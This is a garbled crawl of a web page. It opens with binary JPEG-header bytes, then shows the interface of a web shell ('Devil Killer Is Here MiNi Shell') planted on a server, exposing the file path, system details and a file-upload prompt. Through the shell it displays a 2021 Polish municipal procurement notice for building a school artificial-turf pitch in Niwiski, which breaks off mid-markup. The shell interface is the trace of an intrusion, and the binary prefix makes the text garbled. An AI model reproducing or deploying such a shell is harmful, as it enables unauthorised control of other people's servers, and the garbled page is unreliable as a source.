JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210804/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210804/0013706001-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00137060 z dnia 2021-08-04</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Budowa boiska przyszkolnego z nawierzchnią z trawy sztucznej przy Zespole Szkolno-Przedszkolnym w Niwiskach </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA MOKOBODY</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 711582492</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Plac Chreptowicza 25</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Mokobody</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">08-124</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL925 - Siedlecki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">256411315 wew. 54</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">256411315 wew. 34</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@mokobody.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://ugmokobody.bip.gov.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Budowa boiska przyszkolnego z nawierzchnią z trawy sztucznej przy Zespole Szkolno-Przedszkolnym w Niwiskach </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-21893f1b-f530-11eb-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00137060</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-08-04</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00002571/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.5 Budowa boiska przyszkolnego z nawierzchnią z trawy sztucznej przy Zespole Szkolno-Przedskolnym w Niwiskach</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miniportal.uzp.gov.pl/ oraz https://ugmokobody.bip.gov.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzielenie<br/>zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu<br/>miniPortalu,który dostępny jest pod adresem: hppt://miniportal.uzp.gov.pl/, ePUAPu, dostępnego<br/>podadresemhttps://epuap.gov.pl/wps/portal oraz poczty elektronicznej przetargi@mokobody.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi<br/>posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do następujących<br/>formularzy: „Formularz do złożenia, zmiany, wycofania ofert lub wniosku” oraz do Formularza do<br/>komunikacji”. Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów<br/>elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu<br/>opisane zostały w Regulaminie korzystania z systemu miniPortal oraz Warunkach korzystania z<br/>elektronicznej platformy usług administracji publicznej (ePUAP). Maksymalny rozmiar plików<br/>przesyłanych za pośrednictwem dedykowanych formularzy:„Formularz złożenia, zmiany, wycofania<br/>oferty lub wniosku" i „ Formularza do komunikacji" wynosi 150 MB. Zamawiający może również<br/>komunikować się z Wykonawcami za pomocą poczty elektronicznej<br/>email:przetargi@mokobody.pl.Dokumenty elektroniczne składane są przez Wykonawcę za<br/>pośrednictwem"Formularza do komunikacji" jako załączniki.Zamawiający dopuszcza również<br/>możliwość składania dokumentów elektronicznych za pomocą poczty elektronicznej na adres<br/>email:przetargi@mokobody.pl. Dokumenty należy sporządzać w języku polskim, w formie<br/>elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym, lub w postaci elektronicznej<br/>opatrzonej podpisem zaufanym lub podpisem osobistym,w ogólnie dostępnych formatach danych, w<br/>szczególności w formatach: .txt, .rtf, .pdf, .doc, .docx, .odt</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">W związku z realizacją postanowień Rozporządzenia<br/>Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób<br/>fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich<br/>danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych), dalej<br/>„RODO”, informujemy że:<br/>1. Administratorem Pani/Pana danych osobowych jest Gmina Mokobody reprezentowana przez Wójta<br/>Gminy, Pl. Chreptowicza 25, 08-124 Mokobody, tel. 25 641 13 15, e-mail: gmina@mokobody.pl<br/>2. Informujemy że na mocy art. 37 ust. 1 lit. a) RODO Administrator wyznaczył Inspektora Ochrony<br/>Danych (IOD), który w jego imieniu nadzoruje sferę przetwarzania danych osobowych. Z IOD można<br/>kontaktować się pod adresem mail: inspektor.rodo@naticom.pl<br/>3. Pani/Pana dane osobowe przetwarzane będą na podstawie: <br/>• art. 6 ust. 1 lit. c RODO w zw. z art. 275 pkt 1 ustawy z dnia 11 września 2019 r. – Prawo zamówień<br/>publicznych w celu związanym z postępowaniem o udzielenie zamówienia publicznego prowadzonym<br/>w trybie podstawowym;<br/>• art. 6 ust. 1 lit. b RODO – w odniesieniu do danych osobowych będących stroną umowy w celu i<br/>zakresie niezbędnym do zawarcia i realizacji umowy;<br/>4. Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie<br/>dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy z dnia <br/>11 września 2019 r.– Prawo zamówień publicznych, dalej „ustawa Pzp”. <br/>5. Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 i 4 ustawy Pzp, przez okres<br/>4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy<br/>przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy.<br/>6. Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest<br/>wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym <br/>z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania<br/>określonych danych wynikają z ustawy Pzp.<br/>7. W odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób<br/>zautomatyzowany, stosowanie do art. 22 RODO.<br/>8. Posiada Pani/Pan:<br/>− na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>− na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych (skorzystanie z<br/>prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia<br/>publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie może<br/>naruszać integralności protokołu oraz jego załączników);<br/>− na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych<br/>osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO; <br/>− prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że<br/>przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO.<br/>9. Nie przysługuje Pani/Panu:<br/>− w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>− prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>−na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż<br/>podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/>Zamawiający informuje, że Wykonawca jest zobowiązany do wypełnienia obowiązku informacyjnego<br/>wynikającego z art. 14 RODO względem osób fizycznych, których dane przekazuje Zamawiającemu i<br/>których dane pośrednio pozyskał, chyba że ma zastosowanie co najmniej jedno z wyłączeń, o których<br/>mowa w art. 14 ust. 5 RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">GP.271.1.7.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest budowa boiska przyszkolnego z nawierzchnią z trawy sztucznej<br/>przy Zespole Szkolno-Przedszkolnym w Niwiskach. Zadanie jest współfinansowane przez<br/>Samorząd Województwa Mazowieckiego w ramach „Mazowieckiego Instrumentu Wsparcia<br/>Infrastruktury Sportowej MAZOWSZE 2021”.<br/>Zakres szczegółowy przedmiotu zamówienia: <br/>1) Wykonanie boiska piłkarskiego o nawierzchni z trasy syntetycznej i wymiarach płyty 31x54 m<br/>(pole gry:27x50m);<br/>2) wykonanie podbudowy polegającej na:<br/>• grunt rodzimy + warstwa niwelująca z pospółki bądź żwiru;<br/>• geowłóknina separacyjno-filtrująca;<br/>• warstwa osączająca z piasku lub pospółki o grubości 20cm;<br/>• warstwa konstrukcyjna z kruszywa kamiennego (fr. 31,5 – 63 mm) o grubości 10 cm;<br/>• warstwa klinująca z kruszywa kamiennego (fr. 4 – 31,5 mm) o grubości 5 cm;<br/>• warstwa wyrównująca z miału kamiennego (fr. 0-4 mm) o grubości 5 cm;<br/>• ułożenie obrzeży betonowych o wymiarach 8x30x100 cm w celu oddzielenia od sąsiadujących<br/>elementów terenu na ławie z betonu B15 z oporem. <br/>3) wykonanie nawierzchni boiska poprzez:<br/>• typ włókna: monofil,<br/>• skład chemiczny włókna: polietylen,<br/>• ciężar włókna: min. 11.000 Dtex,<br/>• gęstość trawy: min.97.000 włókien na m2,<br/>• kolor nawierzchni: jasno zielony,<br/>• linie segregacyjne: wklejone w nawierzchnię koloru białego, <br/>• Wysokość włókna: 60mm (wypełnienie trawy syntetycznej zgodnie z badaniem<br/>specjalistycznego laboratoriom).<br/>4) Wyposażenie sportowe:<br/>Bramki aluminiowe:<br/>• Rama aluminiowa bramki – sztuk 2,<br/>• Tuleje mocujące wraz z deklami zaślepiającymi,<br/>• Słupki odciągowe do naprężania siatki osadzane w tulejach,<br/>• Ramka dolna do zamocowania dolnego brzegu siatki,<br/>• Siatka polietylenowa o oczkach PE 12 cm do bramek stałych kolor biały,<br/>• Wymiary bramek 5,00 x 2,00m.<br/>Piłkochwyty:<br/>• Montaż piłkochwytów zabramkowych o wysokości 6 m i dł. 2 x 28,0 m.<br/>• Słupki piłkochwytów wykonane z profili zamkniętych o przekroju 80x80x3mm lub słupek φ100x<br/>3mm,<br/>• Długość słupka: 6,90 m,<br/>• Wymiary fundamentów pod słupki: 0,5x0,5x1,0m wykonanego z betonu B20,<br/>• Słupy powlekane PCV w kolorze zielonym RAL6005,<br/>• Rozstaw osiowy słupków 3,0 m i 6,0 m.<br/>• Siatki ochronne typu bezwęgłowego wykonane z polipropylenu <br/>• Średnica linki φ2,3mm,<br/>• Kolor siatki zielony,<br/>• Montaż siatki: za pomocą karabińczyków w ilości 3 szt/m2 oraz linek stalowych o średnicy<br/>3mm.<br/>UWAGA<br/>W projekcie budowlanym podana jest nieaktualna norma PN-EN 15330 - 1:2008. Aktualną i<br/>obowiązującą normą w Unii Europejskiej jest norma PN-EN 15330 - 1:2014.<br/>Szczegółowy zakres robót zawierają:<br/>Przedmiar robót–załącznik nr 8 do SWZ<br/>Dokumentacja projektowa i techniczna–załącznik nr 9 do SWZ.<br/>Zamawiający nie zabezpiecza terenu na zaplecze budowy. Teren zaplecza budowy Wykonawca<br/>wygrodzi i zagospodaruje we własnym zakresie i na własny koszt, Zamawiający nie wskazuje<br/>lokalizacji terenu zaplecza. Przedmiot zamówienia zostanie zrealizowany zgodnie z<br/>dokumentacją stanowiącą załączniki do SWZ. Szczegółowy przedmiot i zakres zamówienia<br/>określony jest w SWZ, w tym w projekcie budowlanym oraz STWIORB. <br/>2. Roboty budowlane mają być realizowane zgodnie z przedmiarem robót (załącznik nr8 do<br/>SWZ), warunkami opisanymi w umowie (załącznik nr 7 do SWZ) oraz dokumentacją projektową i<br/>techniczną (załącznik nr 9 do SWZ) </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45100000-8 - Przygotowanie terenu pod budowę</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2021-10-29</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">W odniesieniu do ofert, które nie podlegają odrzuceniu, przy wyborze<br/>oferty Zamawiający będzie się kierował następującymi kryteriami o następującym znaczeniu:<br/>Cena oferty brutto - waga kryterium 60 % = 60 pkt. <br/>Okres gwarancji - waga kryterium 40 % = 40 pkt.<br/>Najkorzystniejsza oferta w odniesieniu do tych kryteriów może uzyskać maksimum l 00 pkt.<br/>2. Punkty przyznawane za kryteria będą liczone w następujący sposób:<br/>1) Kryterium: Cena (brutto) [C] - 60 pkt.<br/>najniższa cena oferty brutto<br/>C = ----------------------------------- x 60 <br/>cena brutto oferty badanej<br/><br/>2) Kryterium: Okres gwarancji [G] - 40 pkt.<br/>Przez termin „termin gwarancji i rękojmi” rozumie się natomiast okres zaproponowany przez<br/>Wykonawcę, liczony od dnia następującego po dniu podpisania protokołu odbioru końcowego, przy<br/>czym nie może on być krótszy niż 48 miesięcy.<br/>Wykonawcy otrzymają następującą ilość punktów:<br/>- okres gwarancji jakości wynoszący 48 miesięcy – 20 pkt,<br/>- okres gwarancji jakości wynoszący 54 miesięcy – 30 pkt,<br/>- okres gwarancji jakości wynoszący 60 miesięcy – 40 pkt.<br/>Całkowita punktowa wartość oferty liczona będzie wg wzoru: O = C + G<br/>3. Oferta, która przedstawia najkorzystniejszy bilans (suma punktów przyznanych w oparciu o ustalone<br/>powyżej kryteria C + G) zostanie uznana za najkorzystniejszą, pozostałe oferty zostaną sklasyfikowane<br/>zgodnie z ilością uzyskanych punktów. Wynik będzie traktowany jako wartość punktowa oferty.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 2. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w<br/>postępowaniu dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym:<br/>- Zamawiający nie stawia warunku<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika<br/>to z odrębnych przepisów;<br/>- Zamawiający nie stawia warunku<br/>3) sytuacji ekonomicznej lub finansowej;<br/>a) Wykonawca ma wykazać, że posiada ubezpieczenie, od odpowiedzialności cywilnej w<br/>zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną<br/>niemniejszą niż 200 000,00 zł.<br/>4) zdolności technicznej lub zawodowej:<br/>a) Zamawiający wymaga, aby Wykonawca wykazał, że w okresie ostatnich 5 lat przed upływem<br/>terminu składania ofert, a jeżeli okres działalności jest krótszy - w tym okresie, wykonał<br/>należycie, zgodnie z przepisami prawa budowlanego i prawidłowo ukończył co najmniej dwie<br/>roboty, polegające na budowie, przebudowie lub remoncie obiektu sportowego z nawierzchnią z<br/>trawy syntetycznej o wartości co najmniej 200 000,00 zł brutto–osobno każda z robót;<br/>b) Zamawiający wymaga aby Wykonawca wykazał, że osoby, które będą skierowane przez<br/>Wykonawcę do realizacji zamówienia publicznego, odpowiedzialne za kierowanie robotami<br/>budowlanymi, posiadały kwalifikacje zawodowe, uprawnienia, wykształcenie i doświadczenie<br/>niezbędne do wykonywania zamówienia, a także wykonywały czynności wyznaczone przez<br/>Zamawiającego, w zakresie co najmniej – jeden Kierownik Budowy posiadający uprawnienia<br/>budowlane w specjalności konstrukcyjno-budowlanej bez ograniczeń i posiadający<br/>doświadczenie zawodowe w zakresie kierowania robotami budowlanymi polegającymi na<br/>budowie, przebudowie lub remoncie obiektu sportowego z nawierzchnią z trawy syntetycznej <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Na wezwanie Zamawiającego Wykonawca zobowiązany jest do złożenia następujących oświadczeń<br/>lub dokumentów, potwierdzających brak podstaw wykluczenia:<br/>1) odpis lub informacja z Krajowego Rejestru Sądowego lub Centralnej Ewidencji i Informacji o<br/>Działalności Gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji- w celu<br/>potwierdzenia braku podstaw wykluczenia na podstawie art. 109 ust. 1 pkt. 4 ustawy Pzp;<br/>sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem;<br/>2) informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 108 ust. 1 pkt 1 i 2 ustawy<br/>Pzp oraz w zakresie określonym w art. 108 ust. 1 pkt 4 ustawy Pzp dotyczącej orzeczenia zakazu<br/>ubiegania się o zamówienie publiczne tytułem środka karnego, wystawionej nie wcześniej niż 6<br/>miesięcy przed jej złożeniem;<br/>3) oświadczenie Wykonawcy w zakresie art. 108 ust. 1 pkt 5 ustawy Pzp, o braku przynależności do tej<br/>samej grupy kapitałowej w rozumieniu stawy z dnia 16 lutego 2007 r. o ochronie konkurencji i<br/>konsumentów (Dz. U. z 2020 r. poz. 1076 i 1086), z innym Wykonawcą, który złożył odrębną ofertę,<br/>albo oświadczenie o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub<br/>informacjami potwierdzającymi przygotowanie oferty niezależnie od innego wykonawcy należącego do<br/>tej samej grupy kapitałowej, zgodnie ze wzorem stanowiącym załącznik nr 6 do SWZ</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span 